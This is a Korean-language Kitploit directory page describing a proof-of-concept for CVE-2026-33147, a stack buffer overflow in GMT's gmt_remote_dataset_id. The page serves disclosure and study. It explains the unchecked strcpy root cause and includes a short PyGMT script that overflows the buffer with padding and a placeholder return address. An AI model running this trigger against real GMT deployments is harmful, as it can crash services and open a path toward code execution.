Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-33147 — Proof-of-concept 익스플로잇으로, GMT의 `gmt_remote_dataset_id`에서 발생하는 스택 기반 버퍼 오버플로우를 대상으로 하며, 조작된 데이터셋 이름을 통해 크래시 및 잠재적 코드 실행을 시연합니다. | Kitploit
도구/GitHubGitHub/redyank/cve-2026-33147
Vulnerability AnalysisExploitationBinary Exploitation
GitHubredyank/cve-2026-33147

CVE-2026-33147

Proof-of-concept 익스플로잇으로, GMT의 `gmt_remote_dataset_id`에서 발생하는 스택 기반 버퍼 오버플로우를 대상으로 하며, 조작된 데이터셋 이름을 통해 크래시 및 잠재적 코드 실행을 시연합니다.

저장소 보기
14개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-33147

CVE-2026-33147(gmt_remote_dataset_id의 스택 기반 버퍼 오버플로)

요약

src/gmt_remote.c 내의 gmt_remote_dataset_id 함수에서 스택 기반 버퍼 오버플로 취약점이 확인되었습니다. 이 문제는 특수하게 제작된 긴 문자열이 데이터셋 식별자(예: which 모듈을 통해)로 전달될 때 발생하며, 크래시 또는 잠재적인 임의 코드 실행으로 이어질 수 있습니다.

세부 사항

이 취약점은 사용자 제어 데이터셋 이름을 고정 크기 스택 버퍼 file[PATH_MAX]에 복사할 때 strcpy(또는 이와 유사한 무제한 문자열 연산)를 안전하지 않게 사용하여 발생합니다.

  • 취약 함수: gmt_remote_dataset_id
  • 취약 파일: src/gmt_remote.c
  • 근본 원인: 스택 버퍼에 복사하기 전에 입력 길이 검증이 없음

입력이 PATH_MAX(일반적으로 4096바이트)를 초과하면 반환 주소를 포함한 스택 프레임을 덮어씁니다. 이는 AddressSanitizer(ASan)를 통해 확인되었으며, stack-buffer-overflow를 보고했습니다.

PoC

PyGMT를 사용하는 다음 Python 스크립트는 크래시를 재현합니다:

root@kitploit:~
import struct
from pygmt.clib import Session

with Session() as lib:
    # 스택 버퍼를 오버플로하도록 설계된 페이로드
    padding = "A" * 4096
    fake_ret = struct.pack("<Q", 0x4141414141414141) * 100
    payload = padding + fake_ret.decode("latin-1")
    
    # 'which' 모듈을 통해 오버플로 트리거
    lib.call_module("which", [payload])

영향

이것은 메모리 안전 취약점입니다.

  • 영향 대상: C API 또는 PyGMT와 같은 상위 수준 인터페이스를 통해 GMT를 사용하고 신뢰할 수 없는 데이터셋 이름을 처리하는 모든 사용자 또는 애플리케이션
  • 결과: 최소한 프로그램 크래시를 통한 서비스 거부(DoS)를 유발합니다. 특정 환경에서는 임의 코드 실행에 악용될 가능성이 있습니다.
  • 도구 다운로드